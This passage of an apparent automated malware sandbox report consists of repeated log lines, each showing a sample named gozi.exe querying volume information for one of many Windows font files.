Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
